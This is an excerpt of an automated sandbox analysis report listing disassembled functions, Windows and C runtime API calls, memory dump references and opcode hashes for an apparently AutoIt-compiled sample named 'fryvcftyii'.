                            Function 003E55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            • Opcode ID: 43e69d47a33354eff8db2c4dc73c648192cf024b3c0255406f195ac417853303
                            • Instruction ID: a71b51d2867f9acf8d634f4767d18ed0230d4137df428e0c1bf6089777dd9ba6
                            • Opcode Fuzzy Hash: 43e69d47a33354eff8db2c4dc73c648192cf024b3c0255406f195ac417853303
                            • Instruction Fuzzy Hash: F201D471C00AA8ABCF13AFAB9C0249F7B61BF90362F514315F8285E1D1DB318A11DF91
                            Function 003E53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            • __lock_file.LIBCMT ref: 003E53EB
                              • Part of subcall function 003E6C11: __lock.LIBCMT ref: 003E6C34
                            • __fclose_nolock.LIBCMT ref: 003E53F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: 8615cf1158e44e04ffe9a84746dbd2d22595991f02a35c74d09b336f8ae41490
                            • Instruction ID: 3474841fdc5997304cd0e12001dcda8f2dd46e6e6b6c92346c5e9e687a7086c1
                            • Opcode Fuzzy Hash: 8615cf1158e44e04ffe9a84746dbd2d22595991f02a35c74d09b336f8ae41490
                            • Instruction Fuzzy Hash: 57F09031C00AA4DADB13AF6798067AE77A06F41379F358309A428AF1C1CFBC89419B52
                            Function 003CF290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2d71404e68f38ac84d08345099b03f45b441d22d0ce1f8513c18117656bf1244
                            • Instruction ID: 962b756ade9acfadb5225bdcd7a59afb2334887740bd618d3ed1fd3adcc9264f
                            • Opcode Fuzzy Hash: 2d71404e68f38ac84d08345099b03f45b441d22d0ce1f8513c18117656bf1244
                            • Instruction Fuzzy Hash: D86186B460024AAFCB16DF60C881FAAB7AAEF44304F25847EE906DB281D775ED51CB50
                            Function 003D1FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 433c9fe10fe9b6eca1773583414bfe60d50f47435df1dbd87c96b975a4e29bc6
                            • Instruction ID: 7634ced53cf0f55b198b74b625681c590b57795580082c655ce682665f3ef9b0
                            • Opcode Fuzzy Hash: 433c9fe10fe9b6eca1773583414bfe60d50f47435df1dbd87c96b975a4e29bc6
                            • Instruction Fuzzy Hash: B651BC31600604AFCF16EF68D991FAE77A6AF85310F15856EF806AF392CA34ED40CB54
                            Function 003C5AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 003C5B96
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 785d118d856ddee1f97cc237b91a060721f20fb216dbb3897837ace25f6b8a6e
                            • Instruction ID: 8fd705d27ee85e91e7107617abde5abf90aa45e10366e6c884d845af9183637f
                            • Opcode Fuzzy Hash: 785d118d856ddee1f97cc237b91a060721f20fb216dbb3897837ace25f6b8a6e
                            • Instruction Fuzzy Hash: 4E313931A00A09AFCB19DF6CC884AADBBB5FF48310F158629E819D7710D770BDA0CB90
                            Function 003E0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: 41b40e3e292d81f52e20ef505534d54ebfc19d3576cb3004bbc7ff99b47fe395
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: 7C310270A001559BC71ADF4AC480A69F7A6FB49300B3587A5E80ACF791D6B1EDC1DB80
                            Function 003FFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 8d1a2c6d9983344bebd53e2f8fb6a49000114ab17391852b004eb33c96be4315
                            • Instruction ID: 054249fe8002bfc2a8a2b2e5b9c7573d331f74a8a509fcfab1a813af82836a8c
                            • Opcode Fuzzy Hash: 8d1a2c6d9983344bebd53e2f8fb6a49000114ab17391852b004eb33c96be4315
                            • Instruction Fuzzy Hash: BF4125745047408FDB15DF14C448F1ABBE0BF45318F0A88ACE89A8B362C732EC45CB42
                            Function 003C59B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 94f1565c1763b31aacea58dee8189ed040648cc4d338b6c3ac13c14149b94f87
                            • Instruction ID: ea3596b85671d616b56666285aa81d1b9e4d14ce9e0483158cd4eb0e81f4f39d
                            • Opcode Fuzzy Hash: 94f1565c1763b31aacea58dee8189ed040648cc4d338b6c3ac13c14149b94f87
                            • Instruction Fuzzy Hash: 2D210571900A08EBCB029F52E884B7A7BB9FF00310F21847EE589D9150EBB098D0D745
                            Function 003C4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 003C4BEF
                              • Part of subcall function 003E525B: __wfsopen.LIBCMT ref: 003E5266
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4E0F
                              • Part of subcall function 003C4B6A: FreeLibrary.KERNEL32(00000000), ref: 003C4BA4
                              • Part of subcall function 003C4C70: _memmove.LIBCMT ref: 003C4CBA
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            • Opcode ID: e466e76451470500d68d97acbc7140d87f02229943b4914635b7c721e6d5dd5d
                            • Instruction ID: 2a3b8fbb7c1eafeff3f8e7c58de9b231b33f52ec4f5d4a0f9177f0227b4330ac
                            • Opcode Fuzzy Hash: e466e76451470500d68d97acbc7140d87f02229943b4914635b7c721e6d5dd5d
                            • Instruction Fuzzy Hash: 1811E331600209ABCF16AFB0D826FAE77A9AF44750F11882DF942EB181DA759E049B51
                            Function 003FFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 69e361ff06e7cc9230d050aa24d96173ed9600694a0107f27563cb15daab2972
                            • Instruction ID: 2a5a65fd19082051bf85fc29afa9e700af4340db1f3c3c177460baea508a52c3
                            • Opcode Fuzzy Hash: 69e361ff06e7cc9230d050aa24d96173ed9600694a0107f27563cb15daab2972
                            • Instruction Fuzzy Hash: 2D21FFB45087459FCB16DF24C444F1ABBE0BF88314F05896CE98A9B762D731E809CB92
                            Function 003C5BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 003C5C16
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 183183267d647eac570d3bf490946456c9a2755b7abe3db0740a3453a9517eda
                            • Instruction ID: 8709cc0de1df898b02d432ef524107ba8d7a9cc7cac6cad97aa6a39d19a836c2
                            • Opcode Fuzzy Hash: 183183267d647eac570d3bf490946456c9a2755b7abe3db0740a3453a9517eda
                            • Instruction Fuzzy Hash: 23113A35200B059FD3228F19C880F62BBE8EF44760F10C92DE9AAC6A51D770FC84CB60
                            Function 003C5A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                            • Instruction ID: 65bbd91135c330d78bfa9829e291b8cf198a52d0be4e076a4a1fd28d58877f2f
                            • Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                            • Instruction Fuzzy Hash: 020184B9600A42AFC306EB69C441D26F7A9FF853107144569E519C7742DB75FC61CBE0
                            Function 003E4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            • __lock_file.LIBCMT ref: 003E48A6
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            • Opcode ID: 9f2a8f80c193f6685ee1ecd974a1a55cb32cb02590b90158c1b891151cdbfaa1
                            • Instruction ID: 24432ecb00f602e890a2f73a1e015f1c1e96416190bb12eb047c6ff4682b8409
                            • Opcode Fuzzy Hash: 9f2a8f80c193f6685ee1ecd974a1a55cb32cb02590b90158c1b891151cdbfaa1
                            • Instruction Fuzzy Hash: FCF0F431C006A5EBDF13AFA68C0639E36A0AF04320F118604F4289E1C1CB79C950DB41
                            Function 003C4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • FreeLibrary.KERNEL32(?,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4E7E
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 1f6f328fa0d5ddf334e2ed897211ed33dc288e07b64612fb59dcd181952edf57
                            • Instruction ID: 5a75eddcd38b27e1905055c837fd9cfa1ec724ce14b45ea829278dbfb232dd0a
                            • Opcode Fuzzy Hash: 1f6f328fa0d5ddf334e2ed897211ed33dc288e07b64612fb59dcd181952edf57
                            • Instruction Fuzzy Hash: 62F01575505711CFCB369F74E4A4D52BBE5BF143293228A3EE1DA82A20C7329C44DF40
                            Function 003E0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,003C72BD,00000001,00486290,?,003C3BBB,004852F8,004852E0,?,?), ref: 003E07B0
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LongNamePath_memmove
                            • String ID:
                            • API String ID: 2514874351-0
                            • Opcode ID: 58af60e5200f5e6e85a62841391fbf65b4eebeaee221a19a279da0483c0f4370
                            • Instruction ID: 4c70fdc8e6eb912b78425d08a26c6fff839995b1cdc3aac8eaccddf0ff3bd8b0
                            • Opcode Fuzzy Hash: 58af60e5200f5e6e85a62841391fbf65b4eebeaee221a19a279da0483c0f4370
                            • Instruction Fuzzy Hash: FFE0CD369051285BC721D65C9C05FFA77DDDF897A0F0441F5FD0CD7204D9A1AC8086D0
                            Function 00428E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                            • Instruction ID: 8c535ef5005e2ed0fcecbf11352e7d8238941578ae84ef0ec79c72f4b4525fc6
                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                            • Instruction Fuzzy Hash: B2E092B0204B105BD7398A24D800BA373E1AB06304F00091DF2AAC3341EF627841875D
                            Function 003E2C44 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E3217: __lock.LIBCMT ref: 003E3219
                            • __onexit_nolock.LIBCMT ref: 003E2C60
                              • Part of subcall function 003E2C88: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2C9B
                              • Part of subcall function 003E2C88: DecodePointer.KERNEL32(?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2CA6
                              • Part of subcall function 003E2C88: __realloc_crt.LIBCMT ref: 003E2CE7
                              • Part of subcall function 003E2C88: __realloc_crt.LIBCMT ref: 003E2CFB
                              • Part of subcall function 003E2C88: EncodePointer.KERNEL32(00000000,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2D0D
                              • Part of subcall function 003E2C88: EncodePointer.KERNEL32(003FB5BA,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2D1B
                              • Part of subcall function 003E2C88: EncodePointer.KERNEL32(00000004,?,?,003E2C65,003FB5BA,00479ED0), ref: 003E2D27
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                            • String ID:
                            • API String ID: 3536590627-0
                            • Opcode ID: bb5a610c853c62ca1abb2d10e90bb16b8e5a5b20edff053de94665ceb6e2252d
                            • Instruction ID: f1931664ba80f7ea421d6a7308aeeaca8a9cdbe2f7f8d85db289e25060a74fce
                            • Opcode Fuzzy Hash: bb5a610c853c62ca1abb2d10e90bb16b8e5a5b20edff053de94665ceb6e2252d
                            • Instruction Fuzzy Hash: 3DD01271D4026DAADB12BBA6C90679D76746F10722F608345F418AA1C3CB784B018B86
                            Function 003C5C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 003C5C5F
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 97e45de362e32ec994d0d080faf406b21115c766696af7014ee5bba1e1ef6249
                            • Instruction ID: 54916f5113f16a2ceb429b74e80adbf3b89c168a73d439438824398e87fed457
                            • Opcode Fuzzy Hash: 97e45de362e32ec994d0d080faf406b21115c766696af7014ee5bba1e1ef6249
                            • Instruction Fuzzy Hash: FDD0C77464020CBFE710DB80DC46FA9777CD705710F100194FD0456290D6B27D548795
                            Function 003E525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
